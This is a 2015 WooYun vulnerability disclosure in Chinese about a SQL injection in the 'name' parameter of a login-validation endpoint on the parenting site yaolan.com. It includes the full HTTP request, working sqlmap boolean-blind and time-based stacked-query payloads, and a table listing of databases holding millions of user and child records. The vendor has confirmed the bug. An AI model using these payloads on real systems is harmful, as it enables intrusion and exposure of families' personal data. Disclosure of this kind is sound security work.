当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118715

漏洞标题:摇篮网某处SQL注入(上大量的母婴信息侧漏)

相关厂商:摇篮网

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-07 21:52

修复时间:2015-07-23 17:22

公开时间:2015-07-23 17:22

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全
-------------------------------------------------
能上首页不?

详细说明:

下面为本次测试的详细内容
POST数据包:

POST /AjaxValidate.aspx HTTP/1.1
Host: user.yaolan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.yaolan.com/RegisterC.aspx?desc=&back_url=http%3a%2f%2fjifen.yaolan.com%2f&immediately=False
Content-Length: 21
Cookie: __yl__test__cookies=1433598576400; _yl_ct=1433598576401; _yl_fr=4; _yl_utmb=1433598446840; _yl_utma=1433598446837.1433598446840; _yl_ft=1433598446836; _yl_nvid=ab316044bfbd5f5e4994d115bc55d823; _yl_pageid=AFfq22,RJrqqu,A7RjMr; Hm_lvt_04a8007d069875ec6d7ac710d65c2b92=1433598448; Hm_lpvt_04a8007d069875ec6d7ac710d65c2b92=1433598577; login_bg_num=1; base_domain_c454868876824458837735f572c90c75=yaolan.com; stay_bg=1; ASP.NET_SessionId=hi5hacmbagucv2ysmqlpymjx; theme=c; __CT_Data=gpv=1&apv_4579_www03=1&cpv_4579_www03=1; WRUID=708976282.1226983508; WRIgnore=true; xnsetting_c454868876824458837735f572c90c75=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22shareAuth%22%3Anull%7D
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
type=1&name=wooyun999


name 参数未过滤 可注入 2库 (具体参数见下图 以及漏洞证明)

0.png


两个库我都看了下数据量 information_schema 里的数据量不大 但是 user_yaolan_com 里的数据量 大大滴的啊

2.png


Database: user_yaolan_com
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LoginInfo               | 6740391 |
| ChildInfo               | 6740373 |
| UserBaseInfo            | 6740285 |
| UserExtInfo             | 6740162 |
| MarkInfo                | 6739086 |
| iur_child_birth_based   | 5483060 |
| UserInterestInfo        | 1021602 |
| UserSource              | 1006414 |
| ChildInterestInfo       | 496016  |
| CoinInfo                | 444240  |
| NoDefaultChildInfo      | 258726  |
| UserSignature           | 81646   |
| BoroughList             | 2870    |
| word_filter_reg         | 2809    |
| CityList                | 341     |
| CountryList             | 243     |
| UserVerifyDetail        | 136     |
| UserInterestDetailList  | 107     |
| UserGeekDetail          | 48      |
| ChildInterestDetailList | 40      |
| UserInterestList        | 40      |
| ProvinceList            | 35      |
| ChildInterestList       | 22      |
| TradeList               | 17      |
| GradeList               | 16      |
| ProfessionList          | 12      |
| IncomeList              | 8       |
| EducationList           | 5       |
| GeekList                | 4       |
| VerifyList              | 1       |
+-------------------------+---------+


ChildInfo 表内容(证明数据量需要 见谅)

3.png


4.png


其他表就不深入了

漏洞证明:

POST parameter 'name' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 270 HTTP(s) req
uests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=1&name=wooyun999' AND 7721=7721 AND 'VdGz'='VdGz
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: type=1&name=wooyun999';(SELECT * FROM (SELECT(SLEEP(5)))wPGn)#
---
[22:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
[22:19:20] [INFO] fetching database names
[22:19:20] [INFO] fetching number of databases
[22:19:20] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[22:19:20] [INFO] retrieved: 2
[22:19:21] [INFO] retrieved: information_schema
[22:19:54] [INFO] retrieved: use
[22:20:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
r_yaolan_com
available databases [2]:
[*] information_schema
[*] user_yaolan_com
[22:20:44] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\user.yaolan.com'
[*] shutting down at 22:20:44

修复方案:

良心厂商 上百万的数据 有礼物不?

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-08 17:20

厂商回复:

漏洞确认,正在修复。感谢乌云白帽子提醒。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-07 22:00 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    摇篮网的注入貌似都忽略,汗